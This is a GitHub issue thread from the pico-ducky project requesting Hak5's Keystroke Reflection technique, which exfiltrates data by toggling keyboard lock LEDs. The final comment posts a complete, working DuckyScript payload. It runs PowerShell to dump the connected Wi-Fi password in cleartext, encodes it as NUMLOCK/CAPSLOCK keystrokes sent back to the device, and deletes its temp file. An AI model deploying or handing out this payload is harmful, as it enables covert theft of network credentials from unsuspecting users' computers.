### ISSUE TITLE
Feature: Hak5's Keystroke Reflection Exfoliation

### ISSUE THREAD

**Issue by bluegizmo83** [dbisu/pico-ducky#89]
Not a big, just a feature request.

It would be awesome if you could include Hak5's new Rubber Ducky Keystroke Reflection Exfiltration technique! It allows data Exfiltration WITHOUT the need for Mass Storage or Network. It works by converting your exfil data (text only? not sure) to a binary data stream and then toggling the keyboard LEDs (Caps Lock and Scroll Lock I think) to represent the 1's and 0's of the data stream, and the Rubber Ducky see's any keyboard status LED changes so it decodes and saves the the binary stream to the Rubber Ducky right along side the original payload (actually, it might store it as raw binary and you manual decode if afterwards, I'm not sure), without the Ducky ever having to be mounted as mass storage during the attack!

**Comment by bluegizmo83** [comment]
> Looks like the peripheral-side could be implemented by checking `kbd.led_on(x)`, possibly sending two bits and a clock at once

Yeah I believe that's how it's implemented in Hak5's Ducky as well. I read something about it watches the LED for a specific start sequence and then records the data.

**Comment by dbisu** [comment]
I've been looking at the HID API.  I'm not sure yet if there is a way in the current API to get the data back from the host system.
Doing the exfil via the keyboard LEDs looks fairly straight forward.  I haven't looked at the Hak5 info on the coding they use to send and read the data as an attacker yet.

**Comment by beamzer** [comment]
Just read the whitepaper on: [HAK5](https://cdn.shopify.com/s/files/1/0068/2142/files/hak5-whitepaper-keystroke-reflection.pdf) and they (probably) are using the numlock and capslock states, since those are sent from the computer to the keyboard. So numlock for the 1's and capslock for 0's or vice versa. Simple but effective idea.

**Comment by che3sy** [comment]
I know it's been a long time, but I created a fork and added those features. It does have some caveats, though.
Because of the issue with the while file writing (you can't write files to the Pico storage while it's in HID mode and visible to the host), when you first plug in the Pico with the $_EXFIL_MODE_ENABLED set to true, it will not show up as a drive. Once the loot is saved, (uses scroll lock to signify end of data) the loot.bin file will be created, reinsert the Pico into the computer and it will now show up as a drive, allowing the user to examine the loot, the payload will also not run if a loot.bin exists.  

Here is a example of a script which will get the user's wifi password:

REM Example Simple (unobfuscated) Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN Key (password) to pico ducky


DELAY 2000

SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE

REM Store the currently connected wireless LAN  Key to %tmp%\z
GUI r
DELAY 100
STRING powershell "$ssid = (netsh wlan show interfaces | Select-String 'SSID' | Select-Object -First 1).ToString().Split(':')[1].Trim(); netsh wlan show profile name="$ssid" key=clear | Select-String 'Key Content' | % { ($_ -split ':')[1].Trim() } > $env:tmp\z"
ENTER
DELAY 500

REM Convert the stored credentials into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRING powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,
STRING 0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else
STRING {$o+='%{CAPSLOCK}'}}};$o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
ENTER
DELAY 500

REM Use powershell to inject the CAPSLOCK and NUMLOCK values to the Ducky.
GUI r
DELAY 100
STRING powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;
STRING [System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
ENTER
DELAY 100

REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.

WAIT_FOR_SCROLL_CHANGE
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
